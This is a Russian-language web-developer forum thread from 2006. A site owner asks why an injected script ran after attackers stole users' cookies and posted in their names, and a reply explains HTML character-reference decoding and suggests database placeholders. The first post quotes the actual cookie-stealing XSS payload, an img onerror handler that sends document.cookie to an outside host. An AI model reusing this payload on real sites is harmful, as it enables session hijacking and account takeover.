Форум dkLab и Denwer
Здесь общаются Web-разработчики.
Генеральный спонсор:
Хостинг «Джино»

Кража кукис (почему сработал javascript?) (Nauly)
Author Message
Nauly
Участник форума
Warnings: 1


Joined: 25 Jun 2004
Posts: 104
Карма: 0
   поощрить/наказать

Location: Москва

PostPosted: Sat Mar 11, 2006 9:03 am (написано за 5 минут 13 секунд)
   Post subject: Кража кукис (почему сработал javascript?)
Reply with quote

Здравствуйте!
Крали кукисы у онлайн пользователей и от их имени добавляли записи (зафлудили весь ЖЖ)
getElementById('online') - это ифрэйм, где собственно все и выполнилось
Вопрос в том, почему этот скрипт сработал - неужели браузеры вполне нормально понимают как кавычки последовательность &#39; и не выдают ошибку? Если он понял ее как одинарную кавычку ' - то почему опять таки выполнил скрипт если тут <a href='onerror у меня тоже одинарная?
Code (any language): скопировать код в буфер обмена
<br><span style='font-size:;display:none; px'><img src='http://<a href='onerror=`getElementById(&#39;online&#39;).src=&#39;http://anti-afa.org/bsd-power/jgr/?c=&#39;+document.cookie;`' target='_blank'>onerror=`getElementById(&#39;online&#39;).src=&#39;http://anti-afa.org/bsd-power/jgr/?c=&#39;+document.cookie;`</a>'></span><br /><center><a href='http://bsd-power.narod.ru/' target='_blank'><img src='http://keep4u.ru/imgs/b/0602/9db62fce5dab9824f2.jpg'></a></center><br><br>
Back to top
View user's profile Send private message Send e-mail
y0prst
Участник форума



Joined: 20 May 2004
Posts: 101
Карма: 9
   поощрить/наказать

Location: Вологда

PostPosted: Sat Mar 11, 2006 4:55 pm (спустя 7 часов 52 минуты; написано за 32 секунды)
   Post subject:
Reply with quote

Nauly wrote:
неужели браузеры вполне нормально понимают как кавычки последовательность &#39;
Конечно. См. спецификацию html (www.w3.org/TR/html4/intro/sgmltut.html#attributes).
Back to top
View user's profile Send private message
Nauly
Участник форума
Warnings: 1


Joined: 25 Jun 2004
Posts: 104
Карма: 0
   поощрить/наказать

Location: Москва

PostPosted: Sat Mar 11, 2006 10:37 pm (спустя 5 часов 41 минуту; написано за 1 минуту 26 секунд)
   Post subject:
Reply with quote

Спасибо!

К сожалению, не знал (

А как же тогда защитить движок от кавычек? т.е. во что их превращать, ведь при запросе к базе могут быть глюки да и дыра эта. Их же при отправке поста на форуме к примеру во что то превращают? А я вот так переводил, в аски последовательность, собстна, терь не знаю что и делать =/
Back to top
View user's profile Send private message Send e-mail
y0prst
Участник форума



Joined: 20 May 2004
Posts: 101
Карма: 9
   поощрить/наказать

Location: Вологда

PostPosted: Sun Mar 12, 2006 11:24 am (спустя 12 часов 46 минут; написано за 1 минуту 59 секунд)
   Post subject:
Reply with quote

Nauly
Защищать БД "от кавычек" нужно не на этапе передачи данных из браузера на сервер, а во время непосредственного обращения к БД из скрипта.
А как защищать - Сходите, пожалуйста, в Поиск по запросу «placeholder». Спасибо!
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic All times are GMT + 3 Hours
Page 1 of 1    Email to a Friend.
You cannot post new topics in this forum. You cannot reply to topics in this forum. You cannot edit your posts in this forum. You cannot delete your posts in this forum. You cannot vote in polls in this forum. You cannot attach files in this forum. You can download files in this forum.
XML